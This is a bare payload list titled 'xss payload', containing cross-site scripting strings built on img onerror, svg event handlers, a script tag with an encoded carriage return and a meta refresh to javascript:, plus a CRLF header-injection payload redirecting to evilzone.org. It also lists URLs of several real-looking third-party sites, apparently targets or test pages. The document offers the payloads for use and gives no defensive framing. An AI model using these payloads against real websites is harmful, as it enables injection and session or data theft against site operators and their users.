xss payload 

"><img src=x onerror=prompt(document.domain)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
	<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>




https://alphauniverse-latin.com


%0d%0aLocation:%20http://www.evilzone.org




https://m.alibaba.com/photo/testxss.html


https://www.jp.playsation.com/
